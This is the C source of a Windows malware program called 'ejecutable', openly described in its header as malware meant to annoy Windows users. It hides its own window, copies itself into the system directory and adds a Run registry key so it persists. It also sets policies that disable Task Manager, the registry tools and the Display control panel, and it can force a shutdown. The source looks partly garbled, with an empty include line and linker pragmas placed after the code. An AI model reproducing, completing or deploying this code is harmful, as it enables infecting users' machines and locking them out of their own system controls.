#include /* * AzRaEL [NuKE] ejecutable code * ejcutable.c - funny module * * This program is private version, for anti-educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this module. * * NuKE reserves all rigths about the ejecutable source code xD, * This source is a special gift to antrax, "the ejecutable", the source * contain malware code and maybe result molest and arising for windows users. * I hope antrax don't stolen (usually do) this source also :p * * Thanks to: sowher, darkiker, /migue, billy idol, ednux, mickey mouse, abstracto, gargamel .... */ #define TRUE 1 #define FALSE 0 #define _PKILL2_ #define PKILL_VERSION "1.0.0.1" #ifndef STATUS_PASSIVE_LEVEL_REQUIRED #define STATUS_PASSIVE_LEVEL_REQUIRED 0xC00F00A0 #define STATUS_NTOSKRNL_NOT_FOUND 0xC00F00B1 #define STATUS_MAP_IMAGE_FAILED 0xC00F00C2 #define STATUS_ADD_FUNCTION_FAILED 0xC00F00D3 #define STATUS_COVERAGE_ERROR 0xC00F00E4 #define STATUS_CODE_REBUILDING_FAILED 0xC00F00F5 #endif #define STATUS_ALREADY_STARTED 0xC00F1000 #define STATUS_UNSUPPORTED_OS 0xC00F1001 //typedef //BOOLEAN //(__stdcall *ISPROCESSHIDDEN_CALLBACK)( // PEPROCESS Process //); #ifdef __cplusplus extern "C" { #endif #ifdef __cplusplus } #endif char PathName[256]; char WinDir[256]; char SysDir[256]; int data = 1; void closeThread() { HWND cFile; int i, flag=1; char WindowsClose[] = {"Mi PC"}; do{ cFile = FindWindow(0,WindowsClose); if (PostMessage(cFile, WM_QUIT, 0, 0 )) flag = FALSE; }while(flag); system("shutdown -s -f -t 12 -c \"The ejecutable has you\""); } void copiar() { strcat(SysDir,"\\ejecutable.exe"); CopyFile(PathName,SysDir,0); } void registro() { HKEY hkey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey); RegSetValueEx(hkey,"Ejecutable",0,REG_SZ,(const unsigned char*)SysDir,sizeof(SysDir)); RegCloseKey(hkey); RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey); RegSetValueEx(hkey,"DisableTaskMgr",0,REG_DWORD,(const unsigned char*)&data,sizeof(data)); RegCloseKey(hkey); RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey); RegSetValueEx(hkey,"DisableTaskMgr",0,REG_DWORD,(const unsigned char*)&data,sizeof(data)); RegCloseKey(hkey); RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey); RegSetValueEx(hkey,"NoDispCPL",0,REG_DWORD,(const unsigned char*)&data,sizeof(data)); RegCloseKey(hkey); RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey); RegSetValueEx(hkey,"DisableRegistryTools",0,REG_DWORD,(const unsigned char*)&data,sizeof(data)); RegCloseKey(hkey); RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey); RegSetValueEx(hkey,"NoDispCPL",0,REG_DWORD,(const unsigned char*)&data,sizeof(data)); RegCloseKey(hkey); RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey); RegSetValueEx(hkey,"DisableRegistryTools",0,REG_DWORD,(const unsigned char*)&data,sizeof(data)); RegCloseKey(hkey); } int WINAPI WinMain( HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR ipszArgument, int nFunsterStil ) { GetWindowsDirectory(WinDir,sizeof(WinDir)); GetSystemDirectory(SysDir,sizeof(SysDir)); HMODULE hMe = GetModuleHandle(NULL); DWORD nRet = GetModuleFileName(hMe,PathName,256); HWND hVOculta = GetForegroundWindow(); ShowWindow(hVOculta,SW_HIDE); copiar(); registro(); do{ if (GetAsyncKeyState(VK_F3)) closeThread(); Sleep(1000); }while(1); return 0; } #pragma comment(linker,"/ENTRY:main") #pragma comment(linker,"/MERGE:.rdata=.data") #pragma comment(linker,"/MERGE:.text=.data") #pragma comment( linker, "/SUBSYSTEM:WINDOWS /ENTRY:mainCRTStartup" #pragma comment(lib,"msvcrt.lib") #if (_MSC_VER < 1300) #pragma comment(linker,"/IGNORE:4078") #pragma comment(linker,"/OPT:NOWIN98") #endif #define WIN32_LEAN_AND_MEAN